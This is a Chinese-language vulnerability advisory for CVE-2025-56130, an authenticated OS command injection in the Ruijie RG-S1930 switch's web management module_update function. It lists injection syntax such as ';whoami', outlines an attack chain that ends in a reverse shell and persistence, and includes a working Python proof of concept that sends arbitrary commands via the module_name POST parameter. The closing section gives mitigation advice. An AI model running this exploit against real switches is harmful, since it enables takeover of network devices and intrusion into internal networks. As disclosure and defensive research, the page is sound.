CVE-2025-56130 锐捷RG-S1930交换机OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56130

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-S1930 S1930SWITCH_3.0(1)B11P230

漏洞概述

CVE-2025-56130是锐捷网络技术有限公司生产的RG-S1930系列交换机中存在的一个高危操作系统命令注入漏洞。该漏洞位于交换机的Web管理界面，具体位于/usr/local/lua/dev_config/ace_sw.lua文件中的module_update功能模块。攻击者可以通过向该功能发送精心构造的POST请求，在未经充分验证的情况下注入并执行任意操作系统命令。由于该漏洞的CVSS评分达到8.8，属于高危级别，且攻击向量为网络攻击，认证要求较低（低权限用户即可），因此对使用该系列交换机的企业网络构成严重安全威胁。攻击者成功利用此漏洞后可以完全控制交换机设备，获取敏感网络配置信息、监控网络流量，甚至将交换机作为进一步渗透内网的跳板。

技术细节

该漏洞属于经典的OS命令注入（Command Injection）类型，存在于锐捷RG-S1930交换机的Lua脚本模块中。具体来说，攻击者可以利用module_update功能，通过POST请求在参数中注入操作系统命令。漏洞产生的根本原因在于后端脚本对用户输入的命令参数缺乏有效的过滤和验证机制。攻击者通常采用分号（;）、管道符（|）、反引号（`）或$(command)语法来分隔和注入额外命令。例如，攻击者可以在正常的模块更新请求中附加如;whoami或|ls等命令来执行系统操作。由于该功能需要低权限认证即可访问，攻击门槛相对较低。攻击者还可以利用此漏洞进行反弹shell操作，从而建立持久化访问通道。

攻击链分析

STEP 1

步骤1

扫描识别目标：识别运行存在漏洞固件版本的锐捷RG-S1930交换机，确认Web管理界面可访问

STEP 2

步骤2

认证获取：使用低权限账户登录交换机管理界面（需要有效的用户凭证）

STEP 3

步骤3

构造恶意请求：构建包含命令注入payload的POST请求，目标是/lua/module_update端点

STEP 4

步骤4

命令注入执行：通过分号、管道符等特殊字符注入恶意系统命令并发送请求

STEP 5

步骤5

验证利用：检查响应确认命令执行成功，可获取命令输出结果

STEP 6

步骤6

持久化控制：利用漏洞建立反弹shell或植入后门，实现对交换机的持久控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56130 PoC - Ruijie RG-S1930 OS Command Injection
# Target: module_update in /usr/local/lua/dev_config/ace_sw.lua

def exploit(target_ip, target_port=443, cmd='whoami'):
    """Execute arbitrary command on Ruijie RG-S1930 switch"""
    url = f"https://{target_ip}:{target_port}/lua/module_update"
    
    # Payload construction - command injection via POST parameter
    # Using semicolon to chain commands
    payload = f";{cmd}"
    
    data = {
        'module_name': 'test' + payload,
        'action': 'update'
    }
    
    try:
        response = requests.post(url, data=data, verify=False, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response:\n{response.text}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [cmd]")
        sys.exit(1)
    
    target = sys.argv[1]
    command = sys.argv[2] if len(sys.argv) > 2 else 'whoami'
    exploit(target, 443, command)

影响范围

Ruijie RG-S1930 S1930SWITCH_3.0(1)B11P230及之前版本

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1）立即限制交换机的管理平面访问，仅允许管理VLAN内的可信IP访问Web管理界面；2）禁用不必要的交换机管理协议如HTTP/HTTPS管理，优先使用带外管理方式；3）在核心交换机上部署严格的访问控制列表（ACL），限制对受影响设备的访问；4）加强对交换机管理账户的监控，及时发现异常登录和操作行为；5）考虑部署入侵检测系统（IDS/IPS）监控针对该漏洞的扫描和利用尝试。